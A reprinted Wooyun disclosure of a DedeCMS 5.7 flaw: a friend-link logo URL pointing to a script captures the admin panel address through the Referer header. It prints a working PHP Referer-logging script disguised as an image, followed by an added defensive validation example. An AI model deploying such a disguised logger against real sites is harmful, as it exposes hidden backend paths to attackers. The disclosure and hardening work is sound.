DedeCMS (Zhimeng) design flaw causes backend address leak | wooyun-2014-76556 | Wooyun

Source: Internet
Author: User
Tags imagejpeg
Vulnerability overview (113 people following this vulnerability)

Vulnerability number: wooyun-2014-76556
Vulnerability title: DedeCMS design flaw causes backend address leak
Related vendor: Dedecms
Vulnerability author: MuZhU0
Submission time: 2014-09-19 14:26
Public time: 2014-12-15 14:28
Vulnerability type: Design defect / logic error
Hazard rating: High
Self-rated rank: 15
Vulnerability status: Vendor has been notified of the vulnerability but ignored it
Vulnerability source: http://www.wooyun.org
Tags: logic error, improper design
Collected by 21 people; shared: 0

Vulnerability details disclosure status:

2014-09-19: Details have been sent to the vendor and are awaiting vendor processing
2014-09-24: Vendor proactively ignored the vulnerability; details opened to third-party security partners
2014-11-15: Details opened to core white hats and experts in related fields
2014-11-25: Details opened to ordinary white hats
2014-12-15: Details opened to intern white hats
2014-12-15: Details opened to the public
Brief description:

A design flaw: the program filters some input too loosely, which leads to leakage of the backend (admin panel) address. Only version 5.7 was tested; other versions appear to have the same problem.

Detailed description:

DedeCMS does not strictly validate or filter the logo URL submitted with a friend-link (link exchange) application, so a URL ending in .php, .asp or another script suffix can be submitted.

When the links are then viewed in the backend, as shown in the following image, the logo picture is loaded from exactly the URL that was submitted in the application, so the administrator's browser sends the backend page address as the Referer to that URL.

x.php code (the submitted "logo" file, which records the Referer of whoever loads it):

<?php
// Save the Referer header of the request that loaded this "image" into x.txt.
file_put_contents('x.txt', isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '');

// Then serve a real JPEG so the request looks like an ordinary image load.
header('Content-type: image/jpeg');
$img = imagecreatefromjpeg('x.jpg');
imagejpeg($img);
imagedestroy($img);
?>

When this file is requested, it reads $_SERVER['HTTP_REFERER'] and writes it to x.txt.
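As an added example (not from the report and not DedeCMS code), this is how a defender could harden the friend-link logo handling in PHP: validate the submitted URL, and render the backend-side <img> with a no-referrer policy so that even a URL which still turns out to be a script never receives the backend address. The function names are my own.

```php
<?php
// Added example, not DedeCMS code; hypothetical helpers for the friend-link logo.

// Accept only absolute http(s) URLs whose path ends in an image extension and
// that carry no userinfo, query string or fragment (so "x.jpg?x.php" fails too).
function validate_logo_url(string $url): bool
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    if (isset($parts['user']) || isset($parts['query']) || isset($parts['fragment'])) {
        return false;
    }
    $ext = strtolower(pathinfo($parts['path'] ?? '', PATHINFO_EXTENSION));
    return in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true);
}

// Render the logo for the backend page. The extension check is only a first
// filter (a remote server can still serve a script under a .jpg name), so the
// real mitigation is referrerpolicy="no-referrer": the browser then sends no
// Referer when it fetches the logo, and the backend path cannot leak.
function logo_img_tag(string $url): string
{
    if (!validate_logo_url($url)) {
        return '<span class="logo-invalid">[invalid logo URL]</span>';
    }
    return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8')
         . '" referrerpolicy="no-referrer" alt="logo">';
}

// Defence in depth for every admin page: send this before any output so all
// sub-resource requests from the page omit the Referer.
function send_no_referrer_header(): void
{
    header('Referrer-Policy: no-referrer');
}

// Constructed sample inputs for a quick self-check.
$samples = [
    'http://example.com/logo.jpg'    => true,
    'http://example.com/x.php'       => false,
    'http://example.com/x.jpg?x.php' => false,
    'javascript:alert(1)'            => false,
];
foreach ($samples as $url => $expected) {
    echo str_pad($url, 34), validate_logo_url($url) === $expected ? "ok\n" : "MISMATCH\n";
}
```

The referrerpolicy attribute and Referrer-Policy header arrived in browsers after this 2014 report; on older clients, proxying the logo through the CMS (fetching and re-encoding it server-side) achieves the same goal of never exposing the backend URL to a third-party host.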



Vulnerability Proof:


Repair scheme:

It should be clear by now; I will not elaborate.

Copyright notice: when reprinting, please credit the source: muzhu0@Wooyun

Vendor response:

Hazard rating: No impact, vendor ignored

Ignore time: 2014-09-24 14:28

Vendor reply:

Latest status:

None yet.

Vulnerability evaluation:

Evaluate this vulnerability information so that its value can be fed back better, including objectivity, completeness of content and whether it has learning value (0 people have evaluated so far). Log in to rate.

2014-09-19 14:27 | Mother Kangaroo (ordinary white hat | rank: 441 | vulnerabilities: 59 | The original scenery of the hometown.mp3): Liu Ming ~.

1# 2014-09-19 14:38 | Yulinga (ordinary white hat | rank: 496 | vulnerabilities: 70): This is good.

2# 2014-09-19 15:15 | See the main amber (passer-by | rank: 25 | vulnerabilities: 2): Visual Fire

3# 2014-09-19 15:21 | U-God (core white hat | rank:
